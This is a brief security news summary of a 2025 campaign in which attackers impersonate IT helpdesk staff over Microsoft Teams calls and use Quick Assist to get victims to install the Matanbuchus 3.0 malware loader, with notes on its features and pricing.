A sophisticated cyberattack campaign came to light in July 2025, that weaponizes Microsoft Teams calls to deploy the latest iteration of Matanbuchus ransomware.
The attack begins with adversaries impersonating IT helpdesk personnel through external Teams calls, leveraging tactics related to social engineering to convince employees to execute malicious scripts.
In ongoing support sessions, attackers activate Quick Assist and instruct victims to run PowerShell commands that ultimately deploy the Matanbuchus 3.0 loader, marking a significant evolution in the malware’s delivery mechanisms.
Matanbuchus, operating as a Malware-as-a-Service (MaaS) platform since 2021, has undergone substantial enhancements in its third iteration.
The malware functions as a sophisticated loader primarily designed to download and execute secondary payloads on compromised Windows systems, serving as a critical entry point for various cyberattacks that frequently culminate in ransomware deployment.
The latest version introduces advanced capabilities including improved communication protocols, enhanced obfuscation techniques, and comprehensive system features that enable attackers to tailor subsequent attacks based on the victim’s security infrastructure.
The malware is currently being offered at $10,000 for the HTTP variant and $15,000 for the DNS variant, indicating the operators’ confidence in its effectiveness and the substantial resources invested in its development.
The researchers noted that the interception occurred prior to the malware’s public release, suggesting that adversaries were distributing the HTTP loader within trusted circles or utilizing it in their own operations
The attack methodology represents a concerning shift toward leveraging legitimate business communication platforms for malicious purposes.
In this attack the victims receive seemingly authentic IT support calls through Microsoft Teams, creating an environment of trust that facilitates the execution of malicious instructions.
The attackers’ use of Quick Assist, a legitimate Microsoft remote assistance tool, further legitimizes their presence on victim systems while providing the necessary access to deploy their malicious payloads.
This campaign demonstrates the evolving landscape of advance ransomware delivery mechanisms, where traditional email-based phishing attacks are supplemented by direct voice communication through trusted platforms.
Teams calls with combination of social engineering and technical sophistication of Matanbuchus 3.0 creates a formidable threat that can bypass traditional security awareness training and technical controls.
(Sources: Cybersecuritynews.com)
